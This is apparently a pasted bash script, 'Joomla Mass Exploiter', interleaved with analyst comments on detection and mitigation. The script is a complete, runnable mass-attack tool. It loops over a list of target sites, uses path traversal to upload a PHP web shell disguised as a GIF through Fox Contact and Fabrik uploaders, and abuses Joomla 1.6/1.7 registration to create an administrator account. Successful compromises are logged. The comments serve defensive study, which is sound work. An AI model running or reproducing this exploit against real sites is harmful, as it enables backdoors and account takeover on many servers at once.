
Joomla Mass Exploiter

a guest Dec 23rd, 2017 22 Never
  1. #!/bin/bash
  2. # http://blog.zerobyte.id/
  3.  
  4. ## EDIT HERE ##
     # Analyst note: operator-supplied settings. shell_log is the local file that
     # successful upload URLs are appended to; email, username and password are
     # the values comusers() submits in its registration requests. All four are
     # meant to be edited, so the literal values below are weak indicators only.
  5. shell_log="webshell.txt";
  6. email="zombieroot13@gmail.com";
  7. username="schopath";
  8. password="123456";
  9. ## EOF ##
  10.  
  11.  
      # Analyst note: `shell` is the file body that foxcontact() and fabrik() try
      # to place on the target. It starts with the literal text "GIF89a;"
      # (presumably to satisfy checks that only inspect leading magic bytes),
      # carries the marker string "ZeroByte.ID" that foxcontact() later looks for
      # when it fetches the uploaded URL, and contains a PHP snippet that moves an
      # uploaded file to a request-supplied path.
      # Detection: files under the web root that begin with GIF89a and contain
      # "<?php", or that contain "ZeroByte.ID Uploader". Upload handlers should
      # not trust magic bytes or the client-supplied Content-Type on their own.
  12. shell='GIF89a;'$(echo -ne '\n\r\n')'<title>ZeroByte.ID</title>'$(echo -ne '\n\r\n')'<pre><b>ZeroByte.ID Uploader</b></pre>'$(echo -ne '\n\r\n')'<?php $files = @$_FILES["files"];if ($files["name"] != "") {$fullpath = $_REQUEST["path"] . $files["name"];if (move_uploaded_file($files["tmp_name"], $fullpath)){echo "<a href=\"$fullpath\">Done! click here.</a>";}}?><form method=POST enctype="multipart/form-data" action="">'$(echo -ne '\n\r\n')'<input type=text name=path><input type="file" name="files">'$(echo -ne '\n\r\n')'<br><input type=submit value="Upload">'$(echo -ne '\n\r\n')'</form>';
  13. function foxcontact(){
          # Analyst summary: attempts a file upload through the Fox Contact
          # (com_foxcontact) uploader endpoints of the site given in $1, without
          # sending any credentials or cookies.
          # Globals: shell (read, request body), shell_log (appended on success).
          # Outputs: one "[OK] ..." or "[BAD] ..." line on stdout.
          # Returns: 1 when no mid/cid is found and after any detected upload;
          #          otherwise the status of the final echo.
          # What to hunt for in web-server logs and on disk:
          #   - requests to components/com_foxcontact/lib/file-uploader.php,
          #     components/com_foxcontact/lib/uploader.php, or index.php with
          #     option=com_foxcontact and type=uploader, whose qqfile parameter
          #     contains "/../";
          #   - an X-File-Name request header ending in .php sent together with
          #     Content-Type: image/jpeg;
          #   - files named components/com_foxcontact/shell_NNNNN.php (five digits).
          # Mitigation: update or remove the extension; upload handlers must
          # normalise and validate the stored file name, and upload directories
          # should not be able to execute PHP.
  14.     victim=$1;
  15.     rand=$(shuf -i 10000-99999 -n 1);
  16.     filename="shell_"$rand".php";
          # The target page is requested twice (POST, no body); the id that follows
          # name="mid_ / name="cid_ in its anchor tags is scraped from the HTML.
  17.     mids=$(timeout 10 curl -X POST $victim -s | grep '<a name=\"mid_' | sed 's|<a name="mid_||g' | sed 's|"></a>||g');
  18.     cids=$(timeout 10 curl -X POST $victim -s | grep '<a name=\"cid_' | sed 's|<a name="cid_||g' | sed 's|"></a>||g');
          # URL where the uploaded file is expected to be reachable afterwards.
  19.     webshell=$victim"/components/com_foxcontact/"$filename;
          # A module id takes precedence over a component id; the other is set to 0.
  20.     if [[ ! -z "$mids" ]];then
  21.         mid=$mids;
  22.         cid=0;
  23.     elif [[ ! -z "$cids" ]];then
  24.         mid=0;
  25.         cid=$cids;
  26.     else
  27.         echo '[BAD] Com_Foxcontact CID & MID are empty.';
  28.         return 1;
  29.     fi
  30.  
          # Endpoint variant 1 of 4: lib/file-uploader.php. Each variant sends the
          # payload as the request body (method forced to GET) with a 10 s timeout,
          # then fetches the expected URL and checks it for the marker string.
  31.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/components/com_foxcontact/lib/file-uploader.php?cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  32.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  33.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  34.         echo $webshell >> $shell_log;
  35.         return 1;
  36.     else
  37.         echo -ne '';
  38.     fi
  39.  
          # Endpoint variant 2 of 4: index.php loader route with owner=component.
  40.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id="${cid}"&cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  41.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  42.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  43.         echo $webshell >> $shell_log
  44.         return 1;
  45.     else
  46.         echo -ne '';
  47.     fi
  48.  
          # Endpoint variant 3 of 4: index.php loader route with owner=module. The
          # query string contains literal "&amp;" entities, which is a distinctive
          # pattern to search for in access logs.
  49.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id="${cid}"&cid="${cid}"&mid="${mid}"&owner=module&id="${cid}"&qqfile=/../../"$filename;
  50.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  51.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  52.         echo $webshell >> $shell_log
  53.         return 1;
  54.     else
  55.         echo -ne '';
  56.     fi
  57.  
          # Endpoint variant 4 of 4: lib/uploader.php.
  58.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/components/com_foxcontact/lib/uploader.php?cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  59.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  60.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  61.         echo $webshell >> $shell_log
  62.         return 1;
  63.     else
  64.         echo -ne '';
  65.     fi
  66.     echo '[BAD] Com_Foxcontact Not Vulnerable.';
  67. }
  68.  
  69.  
  70. function fabrik(){
          # Analyst summary: writes the payload to a local file cache_NNNN.php
          # (four digits) and submits it as multipart field "file" to the Fabrik
          # (com_fabrik) fileupload plugin's ajax_upload task on the site given in
          # $1. No cookie or credential is sent with the request.
          # Globals: shell (read), shell_log (appended), domain (read).
          # Files: namerand.tmp and cache_NNNN.php in the current directory, both
          #        removed before returning.
          # Outputs: one "[OK] ..." or "[BAD] ..." line on stdout.
          # What to hunt for: POSTs to index.php with option=com_fabrik,
          # task=plugin.pluginAjax, plugin=fileupload and method=ajax_upload from
          # clients that hold no session, and files named cache_NNNN.php appearing
          # under the web root (the destination directory is chosen by the server
          # and is not visible in this listing).
          # Mitigation: update or remove Fabrik, and block PHP execution in any
          # directory that receives uploads.
  71.     victim=$1;
  72.     shuf -i 1000-9999 -n 1 > namerand.tmp
  73.     filename='cache_'$(cat namerand.tmp)'.php';
  74.     echo $shell > $filename;
  75.     exploit=$(timeout 10 curl -s -F "file=@"$filename $victim"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload");
  76.  
              # The attempt is counted as successful when the response body
              # contains the uploaded file name; the file itself is not fetched.
  77.         if [[ $exploit =~ $filename ]]; then
  78.             echo '[OK] Shell: '$domain'/'$filename;
  79.             echo $domain'/'$filename >> $shell_log;
  80.         else
  81.             echo '[BAD] Com_Fabrik Not Vulnerable.';
  82.         fi
  83.  
  84.     rm -f $filename;
  85.     rm -f namerand.tmp;
  86. }
  87.  
  88.  
  89. function comusers(){
          # Analyst summary: on sites that identify as Joomla 1.6 or 1.7, submits
          # two com_users registration POSTs in one session; the first carries
          # jform[groups][]=7 and deliberately mismatched passwords.
          # Globals: username, password, email (read).
          # Files: cookie_com_users.tmp, token_com_users.txt, 1.txt and 2.txt in the
          #        current directory.
          # Outputs: "[OK] ..." / "[BAD] ..." lines on stdout.
          # Returns: 1 on every early exit and after a reported success.
          # What to hunt for:
          #   - POSTs to index.php?option=com_users&view=registration that carry a
          #     jform[groups][] field (a public registration form is not expected
          #     to send one - confirm against your template);
          #   - two registration POSTs from one session seconds apart, the first
          #     with password1 and password2 differing;
          #   - new accounts named "ZerobyteID Exploiter" or using the configured
          #     username/email, and any unexpected member of a privileged group.
          # Mitigation: Joomla 1.6 and 1.7 are end-of-life; move to a supported
          # release, disable self-registration where it is not needed, and audit
          # group membership of recently created accounts.
  90.     victim=$1;
          # Version fingerprint: the page title string for 1.7, then 1.6, is looked
          # up in /administrator/ and /index.php; anything else stops here.
  91.     if [[ $(timeout 5 curl -s $victim'/administrator/') =~ 'Joomla! 1.7 - Open Source Content Management' ]] || [[ $(timeout 5 curl -s $victim'/index.php') =~ 'Joomla! 1.7 - Open Source Content Management' ]]; then
  92.         echo -ne '';
  93.     elif [[ $(timeout 5 curl -s $victim'/administrator/') =~ 'Joomla! 1.6 - Open Source Content Management' ]] || [[ $(timeout 5 curl -s $victim'/index.php') =~ 'Joomla! 1.6 - Open Source Content Management' ]]; then
  94.         echo -ne '';
  95.     else
  96.         echo '[BAD] Com_Users Not Vulnerable.'
  97.         return 1;
  98.     fi
  99.  
  100.     # GET HIDDEN VALUE
           # Loads the registration form, stores the session cookie, and scrapes the
           # name of the hidden input with value="1" that follows the task field
           # (presumably the per-session form token).
  101.     timeout 10 curl -s --cookie-jar cookie_com_users.tmp $victim"/index.php?option=com_users&view=registration" | grep -A 2 '<input type="hidden" name="task" value="registration.register"' | grep '" value="1"' | sed 's|" value="1"|\n|g' | head -1 | sed 's|<input type="hidden" name="|\ntoked: |g' | grep 'toked:' | awk '{print $2}' > token_com_users.txt;
  102.     token=$(cat token_com_users.txt);
  103.     if [[ -z $token ]];then
  104.         echo '[BAD] Com_Users cannot get token.'
  105.         return 1
  106.     else
  107.         echo -ne '';
  108.     fi
           # First POST: mismatched password1/password2 plus jform[groups][]=7
           # (group id 7 is Administrator in a default Joomla install - confirm).
           # The response is saved to 1.txt and must echo the e-mail address back.
  109.     timeout 10 curl -s -L -b cookie_com_users.tmp -d "jform[name]=ZerobyteID Exploiter" -d "jform[username]="$username -d "jform[password1]=12345678" -d "jform[password2]=kkk0ntol" -d "jform[email1]="$email -d "jform[email2]="$email -d "jform[groups][]=7" -d "option=com_users" -d "task=registration.register" -d $(cat token_com_users.txt)"=1" $victim"/index.php?option=com_users&view=registration" > 1.txt;
  110.     if [[ $(cat 1.txt) =~ $email ]];then
  111.         echo -ne '';
  112.     else
  113.         echo '[BAD] Com_Users cannot find web-form.';
  114.         return 1
  115.     fi
           # Second POST: same session cookie and token, matching passwords, no
           # groups field. NOTE(review): this presumably depends on form data from
           # the rejected first submission being kept in the session - confirm
           # against the vendor advisory for these versions.
  116.     timeout 10 curl -s -L -b cookie_com_users.tmp -d "jform[name]=ZerobyteID Exploiter" -d "jform[username]="$username -d "jform[password1]="$password -d "jform[password2]="$password -d "jform[email1]="$email -d "jform[email2]="$email -d "option=com_users" -d "task=registration.register" -d $(cat token_com_users.txt)"=1" $victim"/index.php?option=com_users&view=registration" > 2.txt;
           # A response that still shows the password field is treated as a failed
           # registration; anything else is reported as success.
  117.     if [[ $(cat 2.txt) =~ 'jform[password1]' ]];then
  118.         echo '[BAD] Com_Users failed exploitation.'
  119.     else
  120.         echo '[OK] Com_Users Exploited with ['$username':'$password'], open your email for verification.';
  121.         echo $victim'/administrator/ (user: '$username' | password: '$password')';
  122.         return 1
  123.     fi
  124. }
  125.  
  126. cat << "CREDIT"
  127.  _____              _           _         _     _
  128. |__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  129.   / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  130.  / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  131. /____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  132.                           |___/                  
  133. ----------- Schopath [at] Zerobyte.id -----------
  134. ----------- Joomla Mass Exploiter V.1 -----------
  135. -------------------------------------------------
  136.  
  137. CREDIT
  138.  
       # Analyst note: driver loop. $1 names a file of target base URLs; each
       # whitespace-separated entry is passed to foxcontact, fabrik and comusers in
       # that order, with the comusers scratch files reset before and removed after
       # every target. None of the curl calls in this script sets a User-Agent, so
       # requests carry curl's default one unless the operator's curl configuration
       # changes it. Expect the same short request sequence against many hosts from
       # one source within a brief window; that sequence is a better detection
       # signal than any single request.
  139. list=$1;
  140. $(cat $list | wc -l)
  141. for target in $(cat $list); do
  142.     echo '' > cookie_com_users.tmp;echo '' > 1.txt;echo '' > 2.txt;
  143.     echo '[+] Try: '$target;
  144.     foxcontact $target
  145.     fabrik $target
  146.     comusers $target
  147.     echo '';
  148.     rm -f cookie_com_users.tmp
  149.     rm -f 1.txt
  150.     rm -f 2.txt
  151. done